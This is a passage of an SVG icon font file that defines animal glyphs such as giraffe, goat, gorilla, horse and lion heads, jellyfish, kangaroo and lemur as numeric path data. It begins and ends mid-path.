1-60-18-116-37-171-12-33-19-66-21-101 0-1 0-1 0-2-9-46-33-89-22-142z m35 434c13 0 23 5 24 17 1 8-7 17-16 17-14-1-20-15-23-26-3-10 10-6 15-8z m-268 0c5 2 17-3 14 9-3 11-9 23-21 25-10 1-19-8-18-18 2-13 13-16 25-16z m113-295c-8 27-29 46-40 70-2-32 18-52 40-70z m37-5c34 25 49 53 42 82-8-33-31-50-42-82z m17-53c-23-13-45-10-68-1 29-22 45-22 68 1z" />
<glyph glyph-name="giraffe-head-2" horiz-adv-x="1000" unicode="&#xe85b;" d="M808 540c9 31 0 61-11 90-4 8-7 16-9 23-1 3-3 7 0 9 3 2 5-1 8-3 40-29 71-66 95-109 3-4 5-8 7-12 4-11 11-19 4-33-7-14-6-32-9-48-4-20-13-39-28-54 31 21 36 58 50 92 10-23 14-44 18-65 6-35 6-71 2-107-1-5-1-10-6-14-3-2-5-7-6-10-8-19-16-38-31-54 17 10 23 28 36 43-1-11-4-20-7-28-13-45-35-84-68-117-3-3-6-8-12-4-1 1-4-1-6-1-20-10-41-21-64-22 19-5 37 6 57 8-7-10-16-13-24-18-47-27-99-37-153-35-1 0-3-1-4 0-7 11-19 9-29 11-11 3-21 6-31 11 9-11 24-12 35-19-17-1-33 3-49 8-31 9-58 25-81 48-9 10-18 19-18 35-1 17-6 34-2 52-8-14-4-30-7-46-5 2-6 7-8 10-22 51-19 101 4 151 3 8 14 7 18 15 1 3 3 4 5 6-5 3-7-2-11-2 1 8 7 12 11 18 24 31 54 55 95 60 29 4 79-10 89-48 2-9 4-18 3-28-5-31-31-30-49-21-5 2-10 5-13 9-18 19-43 13-56-13-11-25-12-50 4-73 16-23 39-30 66-28 23 2 44 10 63 23 27 18 37 45 33 77-8 68-50 111-118 124-17 3-33 4-50 0-6-1-12-1-18 1-49 15-87 45-111 91-17 35-12 69 11 99 26 35 63 51 103 60 4 1 7 1 8-4 2-7 8-10 13-14 17-12 34-23 49-38 19-18 32-41 40-67 0 14-5 27-10 40-11 25-30 46-49 66-3 4-7 8-11 13-5 7-2 11 6 11 23 1 46 1 69-2 35-4 69-12 102-25 6-2 10-3 8-12-1-7 5-13 9-19 12-19 24-37 31-58 6-18 7-35 7-53z m-394 90c-5-14-10-26-10-39-2-32 10-59 31-83 24-29 53-51 89-63 10-3 20-5 31-2 7 2 14 0 22-4-94-15-183-150-125-269-25-1-48-6-71-10-13-2-15-4-13-18 3-24 8-48 6-72-2-33-17-60-45-80 5 61-13 103-51 117 30-23 34-53 26-88-1 7-2 12-4 17-9 35-35 53-66 66-2 1-6 1-9 0-34-4-64 5-91 24-11 8-19 17-24 29-6 14-18 24-28 34-18 20-21 43-19 67 1 9 5 16 12 22 58 58 119 114 184 165 17 14 34 30 47 48 7 10 13 21 16 33 9 42 37 70 71 93 5 4 12 8 21 13z m-96-211c71 17 86 45 73 104-19-12-33-29-44-49-10-18-16-38-29-55z" />
<glyph glyph-name="giraffe-head" horiz-adv-x="1000" unicode="&#xe85c;" d="M895 645c-13 4-25 6-38 7-41 2-82 1-121-15-26-10-48-26-60-52-9-19-19-36-31-52-4-5-6-5-11-2-39 24-54 69-35 111 17 38 27 78 32 120 2 11-1 20-12 26h-39c-10-4-12-12-13-22-5-40-17-79-37-114-5-10-11-20-19-27-8-7-14-7-22 0-13 12-21 28-28 43-15 31-24 64-28 98-1 10-3 18-13 21h-40c-11-6-16-15-14-30 6-38 14-76 31-111 21-42 3-91-35-112-5-3-7-2-9 2-10 14-19 27-26 42-15 35-43 54-78 64-44 13-90 14-135 5-3 0-6-1-9-2-6-2-9-5-9-12 3-62 36-102 91-126 36-15 75-21 114-22 8 0 10-2 6-9l0 0c-9-30-10-26 20-24 9 0 19 3 29 4-4-7-10-12-16-15-10-5-21-8-32-13-14-6-26-16-27-34-1-17 5-30 19-40 1 3 2 5 3 8 5 14 19 20 33 14 16-7 26-20 34-35 2-4 0-6-3-8-13-10-27-19-46-15 6-12 9-24 16-35 18-34 37-67 46-105 7-27 6-54-4-80-2-7-4-13-7-20-11-25-7-49 5-72 9-17 21-31 35-43 7-6 14-12 20-18 16-15 33-28 56-33h24c47 17 81 50 108 90 17 23 19 50 7 77-11 25-18 52-14 80 5 28 13 55 27 80 13 26 28 52 40 80-20-7-34 4-49 15-2 1-3 3-1 6 6 14 14 25 27 33 21 12 37 5 42-19 15 6 23 20 21 36-3 18-13 29-29 37-9 4-19 8-29 12-7 3-13 7-19 14 14-1 27-3 39-5 18-2 19-1 13 16-2 5-3 10-6 14-3 6-1 7 5 7 28 0 56 3 84 10 34 9 65 23 90 50 24 25 35 56 36 91 0 7-5 8-9 9z m-431-653c-1-4-3-5-6-5-5 1-9 3-11 7-12 19-26 37-41 56 17-1 30-4 44-8 8-2 12-9 14-17 3-11 2-22 0-33z m90-1c-1-1-3-3-4-4-9-6-13-4-15 6-2 10-3 20 0 30 3 9 8 15 17 17 13 3 26 6 41 7-14-20-28-37-39-56z" />
<glyph glyph-name="giraffe" horiz-adv-x="1000" unicode="&#xe85d;" d="M851 655c-5-1-10-2-14-5-3-3-6-3-8 0-17 16-38 17-60 17-23 1-42-2-59-20-34-35-71-69-102-108-26-31-51-63-76-96-10-13-14-27-5-43 2-5 4-10 6-15 6-18 8-34-4-52-10-13-13-31-17-47-9-40-19-81-22-123-1-34-4-69-1-103 1-19 4-38 8-56 3-14 10-27 21-37 5-5 14-13 11-18-4-6-15-5-23-5-4 1-7 2-10 2-4 1-6 3-5 7 3 18-3 34-12 49-2 3-2 5-2 8-2 43-8 86-13 128-1 3-1 5-5 9v-121c0-10 1-20 1-30 0-27 15-45 36-60 6-4 13-11 11-18-3-6-13-6-21-5-3 0-7 0-10 1-10 2-17 6-21 16-3 10-6 22-17 27-4 1-3 5-2 8 5 41 3 83-5 124-8 43-14 86-18 130-1 12-4 24-7 36-1 4-3 6-8 5-20-3-40-4-59 0-4 1-6 0-7-4-5-30-20-56-37-80-7-10-12-22-14-35-5-31-4-62 2-93 3-14 7-28 11-42 4-18 14-32 28-44 6-4 3-7-1-9-6-5-27-3-32 2-1 1-1 3-1 4 0 12-6 23-11 33-6 11-6 24-7 36-2 15-4 31-8 47-5 20-6 41-8 62 0 10 4 19 8 28 5 12 4 23 0 37-8-15-13-27-16-41-3-13-4-25-3-38 0-2 0-5-1-7-9-16-8-33-9-50 0-24 0-49-1-73 0-2 0-6-1-7-9-6-4-11 0-16 6-8 4-16 4-25 0-2-2-3-4-4-14-7-27 0-27 16 0 20 3 41 5 61 6 43 10 86 7 129-1 12 1 24 3 35 4 34 2 68-6 102-20-23-24-51-34-78-2 3-3 5-5 9-19-30-23-64-26-100-11 42-10 79 12 114 14 22 31 44 42 68 8 20 14 39 21 59 11 31 28 56 59 70 29 13 58 25 87 37 13 6 26 13 32 26 11 20 28 33 46 44 31 22 61 44 91 67 43 33 79 73 122 105 15 11 29 24 48 31 5 2 2 4 1 7-5 9-8 19-7 29 1 10 3 11 11 6 8-5 12-12 16-19 2-4 14-5 16-1 2 2 0 5-1 6-7 7-7 16-11 23 19 2 35-8 42-27 2-5 4-8 10-11 11-6 23-12 27-27 4-10 16-16 25-23 10-9 17-19 21-31 3-7-1-11-7-13z" />
<glyph glyph-name="goat-head" horiz-adv-x="1000" unicode="&#xe85e;" d="M233 384c11 78 41 113 114 126 48 8 86 27 112 69 8 14 19 19 34 10 4-3 9-6 14-2 20 14 33 3 43-14 24-39 61-56 105-63 59-8 99-41 112-101 1-6 2-12 3-23-31 28-60 48-98 55-52 9-92-22-91-75 1-30-3-58-18-85-12-23-14-50 3-73 4-6 6-11 3-18-8-17-50-47-67-47-19 0-61 30-69 49-3 5-1 8 2 12 23 29 16 58 1 86-10 21-15 40-13 64 6 68-44 103-113 81-29-9-52-27-77-51z m268 9c22 44 16 89 1 133-16-45-20-89-1-133z m-438 284c87 69 202 68 290 1 33-25 62-55 100-75 6-3 8-6 4-12-23-30-44-60-86-64-9-1-15-3-18 9-36 121-141 176-272 145-6-2-11-2-18-4z m875 3c-28 2-53 9-78 9-102 1-175-49-207-147-5-15-11-17-25-15-40 6-59 37-81 64-4 4-3 8 3 11 45 24 80 62 121 91 76 51 170 49 267-13z m-479-654c-16 20-18 40-15 60 1 11 7 14 16 8 28-21 54-22 82-1 12 9 18 1 19-11 1-17 0-33-13-51-3 13-2 28-18 25-16-3-17-18-17-31 1-17 9-32 14-49-15 1-16 22-27 19-9-2-12-18-25-24 6 22 17 41 14 63-2 13-5 25-22 21-14-3-7-15-8-29z m115 145c-5-47-42-88-75-85-34 3-69 45-67 81 11-2 22-9 26-16 12-25 34-22 55-22 11-1 19 2 24 12 9 14 23 20 37 30z m-7 59c-2 34 13 58 21 83 6 17 6 36 31 36 7 0 12 8 14 15 2 6 3 12-2 16-6 5-10-1-15-4-4-4-6-13-14-9-3 2-5 7-5 10-1 10 9 8 14 10 15 7 22 22 32 37 17-30 9-57-5-82-21-36-45-72-71-112z m-207 191c11-15 20-31 40-36 10-3 8-10 4-15-4-7-8-5-13 1-5 6-11 18-19 7-9-11 0-23 10-27 53-23 37-76 54-115-30 60-101 104-76 185z" />
<glyph glyph-name="gorilla" horiz-adv-x="1000" unicode="&#xe85f;" d="M542-4c29-31 19-68-20-82-3-1-3 0-8-1 0 0-55-2-73 0-19 2-37 9-56 12-12 3-17 8-19 21-9 79 5 156 17 232 7 41 17 81 25 121-5-4-9-9-11-15-6-13-12-26-16-40-5-13-4-32-12-38-12-8-26 9-40 9-1 0-1 0-3-1 4-6 7-12 12-17 15-16 17-33 8-54-16-34-28-69-44-103-5-12-4-18 8-25 31-16 36-27 30-61-1-10-6-15-15-17-39-7-77-7-116-3-15 2-21 9-25 22-26 78-46 158-60 239-1 6-2 12-3 17-21 142-6 267-6 267 5 20 11 39 27 54 28 28 63 45 99 59 11 5 15 1 16-10 1-13-6-30 13-38 3-1 1-5-2-7-17-14-10-21 8-25 5-1 12-3 15-10-17 3-33 5-49 8-13 2-17-3-13-15 8-21 19-40 37-55 7-6 15-10 25-8 40 7 59 40 46 78-1 2-3 5 0 9 2 0 4 0 6 0 25-14 46-1 67 9 7 4 14 10 8 18-9 13-3 24 1 36 10 27 4 35-24 34-12-1-24-2-36-4-27-6-53-5-79 8-19 8-17 17-6 28 4 5 10 10 16 12 10 5 15 11 18 22 10 40 29 75 60 103 0 0 9 7 28-4 55-24 104-57 146-101 18-19 36-39 50-63-14-9-28-14-36-27 3-2 6-1 9 0 62 37 117 6 141-55 24-63 23-127-10-188-24-44-55-84-89-121-8-10-13-19-9-31 16-49 7-91-28-129-10-11-17-24-28-34-15-13-12-22 0-36z m98 135c-10-3-24 0-28-12-12-38-38-66-65-93-4-4-8-8-4-14 9-15 23-28 23-48 1-7 9-4 14-4 26 0 30 3 38 29 4 11 7 23 10 35 3 8 3 17-4 23-14 13-9 23 3 33 7 5 12 12 18 18 8 7 11 14 6 24-2 5-3 11-11 9z m247-70c-8 25-19 48-36 69-24 30-42 64-25 105 4 9 4 20 5 30 3 67-28 99-95 99-14 0-20-5-26-17-25-46-49-94-92-127-4-3-5-6-4-11 4-23 4-46 2-70 9 2 18 3 25 6 10 4 14 1 18-8 22-44 45-88 67-132 5-10 5-16-7-19-15-3-16-16-15-27 1-14 14-12 23-13 31-1 61 1 92-1 32-2 58 3 68 33 7 44 0 83 0 83z m-582 509c15 7 26 1 37-9 10-10 19-11 30-1 8 7 17 12 25 19 3 3 8 6 4 12-2 4-6 4-10 3-41-3-82-8-122 7-3-8 3-10 4-14 3-20 14-26 32-17z" />
<glyph glyph-name="hen-tracks" horiz-adv-x="1000" unicode="&#xe860;" d="M407 336c-6-2-11-7-14-13-8-10-18-19-29-25-17-10-31-24-45-38-9-9-17-25-30-22-15 4-16 23-22 36 0 2 0 4 0 6-8 50-15 101-22 152-2 12-6 18-18 16-13-2-12-11-12-20 1-9 3-17 3-25 5-46 19-91 17-149-4-52-6-51-56-27-34 15-66 36-105 36-4 0-9 3-11-3-2-6 1-11 7-13 38-13 70-40 110-49 22-5 41-12 57-30 20-21 45-14 57 12 6 14 12 28 24 37 39 29 65 71 100 103 4 4 11 9 6 15-4 4-11 2-17 1z m530 68c-2 5-6 4-10 4-19-4-39-6-57-15-24-12-50-24-75-34-19-8-24-5-27 16-7 39-2 77 5 116 4 26 8 52 11 74 0 13 3 24-11 26-14 2-18-6-19-18-3-43-17-85-17-129-1-17-6-34-14-49-10-18-14-19-29-5-13 12-25 27-40 38-18 14-38 26-52 44-4 6-10 9-17 8-4 0-8 2-10-2-2-4 1-8 3-10 35-30 57-71 95-99 14-10 25-24 30-40 12-36 46-35 66-12 6 7 10 15 20 17 50 7 90 37 135 55 3 1 6 2 8 4 6 2 6 6 5 11z m-661-282c-7-2-11-4-7-13 6-13 12-26 23-38 0 17 1 31 0 45-1 12-9 8-16 6z m437 144c-6 0-6-6-6-11-1-13 0-26 0-38 1-1 2-1 3-1 6 11 13 21 19 32 3 4 7 10 3 14-5 3-12 4-19 4z m-286 84c0-3 10-9 12-8 9 6 4 18 7 27-7-7-20-8-19-19z m127 161c4-8-3-20 8-25 3-1 12 6 12 8-2 10-13 12-20 17z m-330-22c-3-12-4-19-7-28 8 1 14 2 22 3-5 9-9 15-15 25z m550 140c-5-7-9-14-14-23h24c-6 8-2 17-10 23z" />
<glyph glyph-name="horse-head-1" horiz-adv-x="1000" unicode="&#xe861;" d="M361-88c-24 5-39 7-54 11-143 36-196 183-108 302 56 75 134 120 217 157 49 22 100 41 142 75 67 54 71 138 10 181 17-100-10-143-108-173-48-14-98-24-132-67-16-21-35-13-53-3-18 11-24 24-17 46 34 100 83 191 162 263 20 18 38 34 43 61 2 9 3 20 13 22 10 2 18-7 20-15 10-29 32-30 58-32 166-8 297-161 290-335-8-194-109-293-312-307-57-4-112-15-162-46-65-41-69-82-9-140z" />
<glyph glyph-name="horse-head-2" horiz-adv-x="1000" unicode="&#xe862;" d="M925 275c-12-28-24-55-34-83-9-28-16-56-24-86-53 2-108 8-161 17-8 21-14 42-23 61-29 64-88 96-158 86-9-1-17-3-27-4 2-12 4-23 7-34 27 5 53 8 79 0-3-11-7-21-9-31-7-31 2-59 21-83 19-24 40-47 59-71 31-38 51-81 64-128 1-2 1-4 1-7h-430c-5 29-11 58-15 86-8 55-12 109-11 164 1 68 10 134 33 197 39 105 111 176 219 208 30 9 62 13 93 18 2 1 6-2 8-5 45-49 88-100 133-149 51-55 107-104 167-149 3-3 6-5 8-7z m-327 177c1 25-19 46-43 47-28 1-49-18-50-45-1-24 20-47 44-48 27 0 48 19 49 46z m-207 95c-26-26-50-50-75-74-51 44-103 90-156 135 35 57 80 102 138 135 32-67 63-132 93-196z m-61 210c39 22 133 37 180 28-2-14-4-28-6-43-8-48-16-96-24-143 0-4-4-9-7-10-17-9-34-16-52-25-30 64-61 128-91 193z m187-152c9 59 18 117 28 176 74-13 140-42 204-81-2-2-4-4-6-5-37-23-75-46-113-69-6-4-15-5-23-6-28-5-55-10-83-15-2 0-4 0-7 0z m-255-237c-55 19-110 39-165 59-2 1-5 5-5 7 10 49 26 96 49 141 0 1 1 1 2 2 52-44 103-89 155-134-12-25-24-49-36-75z m-10-33c-7-32-13-64-19-98-52 10-104 20-158 31l8 127c58-21 114-40 169-60z m-175-103c53-10 103-20 152-29v-72c-3-1-6-1-9-1-41 1-82 2-124 3-2 0-7 2-8 4-4 31-7 62-11 95z m153-136c3-27 5-53 7-79-14-2-28-3-42-5-22-2-45-4-67-7-9-1-13 1-15 9-5 28-12 55-19 82h136z m12-114c4-23 8-45 12-69h-9c-30 0-61 1-92 0-6 0-9 1-11 8-5 16-11 32-16 49 39 4 78 8 116 12z" />
<glyph glyph-name="horse-head" horiz-adv-x="1000" unicode="&#xe863;" d="M563 475c-49 69-112 112-201 109-30-1-52-14-69-38-19-27-21-58-25-88-1-6 2-11 7-15 9-7 10-16 10-26-3-36-6-71-11-106-5-28 2-36 30-35 17 1 32 0 47-8 9-5 17-5 15 10 6-2 2-13 10-10 6 2 8 8 8 14 0 13 1 25-5 37-5 11-2 22 2 32 3 7 11 2 17 3 48 6 75 32 78 75 3 42-35 76-74 67-15-3-26-12-37-21 4 10 13 16 22 21 36 18 80 3 99-35 24-50 26-102 16-155-12-64-40-121-69-178-17-32-33-66-36-103-4-39-3-77 14-113 3 2 4 5 5 8 15 35 35 68 60 98 20 24 40 48 60 71 98 111 111 269 27 386z m12 20c-13 11-25 22-41 29 120-121 141-254 46-401 13 7 24 16 34 25 69 60 89 160 46 240-22 41-51 76-85 107z m-156-362c62 75 99 252 64 310-1-9-1-19-3-29-3-23-13-43-35-53-10-5-12-10-12-20 1-50 0-101-6-151-2-19-5-38-8-57z m416 291c-1 2-1 3-1 3l-1 1c-19 42-56 60-117 65-20 2-41 0-64 0 46 20 128 3 176-35-11 26-44 49-78 56-24 4-48 2-73 2-25-1-50 2-73 13-30 13-42 36-36 67 3 16 11 27 26 33 15 6 32 8 48 7 12-1 21-6 24-18 2-12-6-24-18-30-1 1-1 1-1 1 2 11 8 23-5 32-11 7-33 4-44-5-21-19-19-58 4-75 37-26 101-21 118 53 17 78-46 118-108 111-23-2-43-11-64-26 30 35 72 42 134 25-25 26-70 34-108 18-21-9-39-22-56-37-14-11-28-23-45-29-34-13-75 18-72 54 1 15 9 25 23 31 13 4 28-1 37-13 5-6 9-13 2-19-5-6-13-7-20-3-8 5-6 11-3 17 0 1 0 2 0 3-24 2-34-10-26-32 8-22 24-33 48-32 20 2 40 21 44 45 6 25-5 51-25 67-2 1-3 2-5 3 0 0-1 0-1 1-1 0-2 1-3 1-2 1-4 3-7 4-1 0-2 0-3 1-38 13-78-13-78-13-31-19-51-48-57-89-2-13-4-27-10-39-14-25-44-33-68-18-18 10-23 43-11 63 5 8 12 13 22 12 10-1 19-5 23-15 4-11-1-19-13-21 0 3 2 6 2 10 0 6-1 13-9 15-7 2-13 0-18-7-7-10-4-29 7-43 10-11 22-14 35-7 29 14 37 57 16 81-27 31-79 26-103-11-15-22-18-47-18-74 0-32 19-59 49-71 18-6 18-9 6-25-5-7-11-13-20-17-8-3-16-2-23 3-4 4-7 8-5 14 2 5 5 11 11 11 15-2 9 8 7 14-3 9-12 14-21 15-10 1-17-3-23-11-19-29-1-73 33-79 20-4 40 0 58 12 8 4 12 10 14 19 11 48 41 75 90 83 19 3 38 1 56-3 77-18 139-62 195-115 42-39 69-88 80-145 3-15 4-30 7-48 7 14 6 27 6 40 1 22-1 44 0 66 2 19 10 36 30 43 22 7 43 5 60-11 16-15 20-34 14-55-2-10-8-18-21-19-11-1-20 3-23 15 18 3 27 13 24 27-2 15-15 23-33 21-16-2-28-11-34-26-12-31-8-60 12-87 7-10 17-15 29-13 35 5 62 21 77 54 15 27 4 66-1 81l-1 3z" />
<glyph glyph-name="horse-tracks" horiz-adv-x="1000" unicode="&#xe864;" d="M228 674c0 8 0 18-9 22-7 2-12-6-17-10-53-40-89-91-105-156-16-60-36-120-34-183 1-51 50-85 97-68 46 15 63 51 68 95 6 55 3 111 0 167 0 44 0 88 0 133z m60 11c-6 4-11 14-19 11-8-4-8-14-9-23-4-46-2-93-2-139 0-42-1-83 0-125 1-31 3-63 21-91 19-32 62-52 94-42 31 9 54 44 53 82 0 47-13 91-24 136-18 76-48 144-114 191z m452-118c0 8-2 16-9 20-7 5-11-4-15-7-60-43-95-101-113-173-13-57-32-113-29-173 3-46 50-78 94-64 39 12 60 38 67 76 11 63 7 127 4 190 0 43 0 87 1 131z m161-141c-17 65-54 115-107 155-14 10-19 9-23-9-1-9-1-18-1-27-1-41-1-82-1-123h0c0-43-1-86 0-129 1-32 6-65 26-92 20-27 59-41 89-32 32 10 54 41 53 78-1 62-20 120-36 179z m-82-331c-6-2-12-5-17-8-20-10-26-23-20-45 5-22 26-41 41-38 24 5 47 34 47 58 0 37-17 48-51 33z m-661 115c-19 1-28-11-28-38-1-27 26-59 51-60 17 0 38 28 38 51 1 21-34 47-61 47z m512-109c-20 1-29-10-29-38-1-26 26-58 50-59 17-1 39 27 40 50 0 21-31 46-61 47z m-362 102c-6-3-11-6-17-8-21-7-24-24-20-43 4-22 26-42 42-39 23 5 46 32 46 56 4 40-24 49-51 34z" />
<glyph glyph-name="jellyfish" horiz-adv-x="1000" unicode="&#xe865;" d="M803 465c-6 57-34 100-84 128-24 13-36 33-46 57-11 27-19 56-33 82-15 26-31 49-63 53-53 8-101-5-135-49-14-18-29-35-45-51-7-7-13-9-23-6-56 13-110-29-110-87 0-13-4-19-15-25-18-11-32-26-43-45-20-34-6-97 45-106 39-7 79-10 118-13 10-1 14-4 15-14 5-46-11-86-37-122-16-21-32-43-43-67-13-26-15-52-1-78 7-15 9-29 2-44-8-17-15-34-22-51-10-20-18-41-22-64-2-18 7-38 22-42 18-6 27 7 35 20 2 2 4 5 5 8 20 54 32 108 21 165-9 43-7 83 24 119 38 44 66 93 67 154 7-3 7-7 7-11 2-28 1-56-10-83-14-37-27-75-15-114 13-46 6-91-4-136-3-14-4-28 0-42 5-16 20-32 32-30 17 3 21 17 24 32 9 48 4 95-7 142-5 24-7 47-1 70 10 50 26 100 14 152-2 8-2 17-3 25-2 9 1 14 11 13 4 0 9 0 13 0 22 0 21 0 16-21-13-55-16-108 14-159 8-14 14-28 20-42 16-39 21-78 1-119-14-30-28-61-36-94-3-12-4-25-2-37 2-9 6-17 16-20 9-3 14 4 20 9 3 4 6 8 8 12 12 19 19 39 25 60 12 43 23 87 12 132-6 27-16 53-25 79-8 24-18 48-24 74-9 39 6 74 13 111 3 12 15 16 32 12 13-3 8-11 7-18-5-45 2-85 39-117 32-29 38-59 21-99-11-28-22-56-23-86-1-39 0-78 12-116 5-12 12-25 27-22 17 4 16 20 18 32 0 2-1 4-1 5-3 20-7 40-10 59-8 38-10 75 3 112 11 30 21 60 9 92-8 21-22 37-34 55-16 27-30 53-23 86 2 11 6 18 20 17 21-1 43-1 64 0 16 1 31 0 46 2 25 3 44 34 42 61z m-310 248c60 0 109-49 109-110 1-59-49-111-110-109-63 0-110 46-110 109 0 63 48 110 111 110z m-139-53c19 0 22-4 17-22-8-30-6-59 7-87 9-20 6-25-16-27-3 0-6 0-9 0-37 0-67 31-67 68 1 37 32 68 68 68z m136-124c33 0 59 25 59 58 1 34-24 60-58 60-34 1-60-25-60-58 0-34 26-60 59-60z m-7 85c1 13 13 23 26 22 13-1 23-14 21-27-1-12-13-21-25-20-13 0-24 13-22 25z m-141-53c11 0 18 7 18 18-1 10-7 15-18 16-9-1-16-6-16-16-1-11 6-18 16-18z" />
<glyph glyph-name="kangaroo" horiz-adv-x="1000" unicode="&#xe866;" d="M656 353c7 22 25 22 34 32 7 7 17 14 13 25-4 13-17 10-26 9-39-3-74-21-107-39-28-16-54-33-81-57 93-54 175-117 220-217-35-4-56 4-63 37-15 67-65 90-121 108-33 10-67 18-100 27-48 14-52 27-22 66 16 21 36 40 47 65 11 28 1 44-29 39-38-6-75-17-112-26-48-11-96-16-145-4-52 13-86 45-101 97 12 5 14-5 17-11 37-54 81-71 145-61 79 14 148 52 217 92 25 15 51 29 78 42 60 28 117 25 172-19 39-31 83-52 133-14-6 3-12 5-17 9-13 8-26 20-18 33 8 14 22 0 33-4 55-23 88-68 110-121 3-6 8-12 2-18-6-5-12-3-18 0-9 5-17 11-26 17-54 36-54 36-101-12-24-23-47-47-72-69-16-13-35-23-62-26z" />
<glyph glyph-name="lemur" horiz-adv-x="1000" unicode="&#xe867;" d="M281 607c-26 1-50 5-72-11 22 12 52-40 72 11z m-139-123c-7-8-17-15-12-28 5-15 19-13 31-15 15 0 52 47 46 61-4 9-11 16-23 9-15-8-31-13-42-27z m147 66c19 5 27 19 30 36 1 6-1 15-6 13-16-6-25-21-34-35-4-6 2-12 10-14z m-60-87c-12 0-18-10-18-20-1-10 9-16 18-15 10 1 19 6 21 17-2 13-10 19-21 18z m-89 79c14 10 36 18 36 35 0 13-17 30-35 30-21 0-21-21-23-34-2-14 8-25 22-31z m160-79c7 4 11 11 11 20 0 7-47 46-54 44-3-2-6-4-7-7-16-26 14-35 20-54 5-13 20-7 30-3z m443-102c14 14 26 31 17 54-18 52-45 98-93 124-61 34-126 63-190 90-35 15-73 10-109 0-21-5-37-11-30-38 4-12-2-25-10-34-12-15-14-28-1-42 12-15 10-29-1-43-25-34-63-58-100-57-43 0-95-7-129 37 5-32 5-61-2-90-2-12-8-23-4-36 14-49 13-100 14-150 0-37-25-72-34-78-37-26 66-28 69-6 8 65 49 117 69 177 4 14 11 27 28 40 11-55 6-107 8-158 2-27 4-54-29-66-7-3-17-11-8-21 11-10 81 12 83 27 6 52 38 90 62 133 14 27 31 56 64 52 31-4 41-38 51-65 3-7 3-13 4-20 2-21 9-40 20-56 12-18 24-34-11-38-6-1-11-7-12-14-2-8 6-8 11-10 38-13 84 8 99 46 14 35 24 74 51 101 41 44 70 98 113 141z m165-200c-9-1-70-34-70-39 2-16 52-58 69-54 27 7 24 34 31 51-1 24-14 42-30 42z m-65 100c6 3 14 5 12 16-11 9-15 35-36 29-28-7-48-29-57-57-5-17 9-31 21-38 12-8 14 9 20 16 11 14 25 25 40 34z m65-60c-4 28-37 45-61 31-18-10-30-28-39-45-9-16 5-24 16-33 25 20 54 28 82 39 2 0 2 5 2 8z m-285-40c-5-9-8-18-12-28-7-17 1-19 15-15 33 8 36 21 11 59-11-3-11-11-14-16z m169 161c7 4 15 8 9 18-5 8-12 20-23 16-22-6-30-28-42-45-9-13-3-24 10-32 14 15 27 33 46 43z" />
<glyph glyph-name="lion-head-1" horiz-adv-x="1000" unicode="&#xe868;" d="M580 482c3-13 6-27 8-41 11-57 3-111-21-163-17-37-39-70-64-102-18-22-35-44-48-69-17-34-24-70-22-108 0-1 0-2 0-3-2 1-2 3-2 4-10 23-15 47-17 72-2 32 2 64 13 95 2 7 4 13 7 19 3 6 7 11 10 17-6-3-12-8-18-13-23-21-35-47-41-77-7-33-5-66 1-98 6-35 16-69 32-101 0 0 0-1 0-1-9 5-16 10-24 16-30 25-46 57-52 95-3 17-5 33-5 50 0 33 9 65 25 94 16 29 38 52 62 73 24 20 49 37 74 55 14 10 28 21 40 34 3 4 7 9 9 14-6-7-14-14-22-20-22-17-47-32-70-49-28-19-55-40-77-66-24-29-41-61-47-99l0-1c-4 8-7 16-8 24-4 25-1 48 5 72 8 31 20 60 36 88 14 25 36 45 59 62 15 11 30 22 44 34 17 14 30 31 35 53 5 20 2 39-4 58-1-2 0-3 0-4l1-5c4-35-7-65-32-90-15-14-31-25-47-36-17-12-35-24-49-40-2-3-4-6-7-8 3 6 3 12 3 19-1 4-1 8-3 12-2 5-5 7-10 5-8-2-14-6-18-13-4-7-9-15-11-24 0-2-2-3-4-4-11-5-22-11-33-16-10-4-14-3-19 7-5 9-10 19-15 29-1 3-2 6-3 9-2 10-1 12 8 17 2 1 3 2 1 3-2 2-4 5-5 7-5 8-4 15-1 23 2 5 5 6 9 2 3-3 6-6 8-9 5-6 10-11 18-13 1 0 2 0 4 0 9 5 18 11 27 18 11 9 13 22 11 35-1 7-3 14-7 21-8 12-20 17-34 13-8-3-15-6-22-10-4-3-4-7-5-12-1-6 0-13 0-19 0-8-2-10-10-6-7 4-11 9-12 17 0 1 0 3-2 4-1 0-3-1-4-2-5-4-9-3-13-1-14 7-23 18-30 31-1 3-2 4-4 5-3 2-5 4-7 6-8 8-8 17-1 26 4 5 10 9 17 12 33 15 66 28 98 45 9 5 18 11 25 20 17 18 38 30 61 40 2 1 3 2 5 3-10-3-20-7-29-12-5-3-10-6-15-9-2-1-3-1-4 1-15 39-11 78 20 109 17 17 49 36 71 42-15-16-27-34-36-54-8-19-13-40-16-61 9 44 26 84 61 114 23 20 60 37 87 40-1-4-2-7-4-11-4-10-9-19-15-28-1 0-1-1-2-2-28-20-47-48-62-79-3-6-5-13-8-19 0 0 0-1 1-2 1 4 3 7 4 11 16 31 35 58 63 79 25 18 52 28 82 32 13 2 26 2 39 2 0-1 0-2 0-2-7-13-13-25-22-37-1-2-3-3-5-4-15-5-28-11-40-20 1-1 1 0 2 0 41 25 85 28 130 13 48-16 85-47 107-93 1-2 2-4 3-6-9-1-18-1-27-1-15 1-30 2-44 3-3 0-5 1-8 2-14 6-30 11-46 13-3 1-4 1-5 5-2 9-7 15-15 20-14 8-28 10-44 9-34-2-64-15-88-40-9-10-17-20-19-34 0 0 0-1 0-2 0-3-1-7 2-9 2-1 5 3 7 5 13 11 25 23 40 33 19 14 41 20 65 18 6-1 13-2 19-6 9-6 13-15 10-25-8-22-23-37-44-45-30-10-58-6-84 14 2-3 4-4 6-6 11-9 23-14 37-16 26-4 49 3 70 20 10 8 19 17 27 27 6 9 11 18 12 29 0 3 1 3 3 2 28-5 53-17 74-35 42-34 67-79 76-132 3-19 3-38-2-57-1 0-1 1-1 2-3 7-8 13-14 18-6 5-13 9-20 13-5 3-10 6-14 9-6 3-11 8-14 15-16 35-41 63-73 85-1 1-2 2-3 3-1-1 0-2 1-2 38-28 61-66 73-111 16-57 11-114-7-170-7-19-15-38-26-55 0-1 0-2-1-2 0 17-2 32-6 48-3 11-7 22-12 32-2 3 0 5 0 8 8 54 4 107-18 157-11 25-26 47-46 64-1 1-2 2-4 3 6-6 12-12 17-19 22-29 36-63 44-99 7-34 7-69 1-104-5-23-16-43-32-61-17-20-38-36-59-51-23-17-48-33-70-52-15-14-29-29-41-47 0-1 0-1-1-2 1 9 4 18 8 26 11 23 25 45 39 67 10 16 22 33 28 51 6 18 16 34 21 51 12 34 16 69 12 104-3 29-10 57-20 84-1 2-2 3-2 4z m-68-61c-10-19-24-35-40-49-9-9-19-18-30-27-21-19-42-39-59-62-26-35-41-75-44-119 2 5 3 10 4 15 10 35 29 65 53 93 19 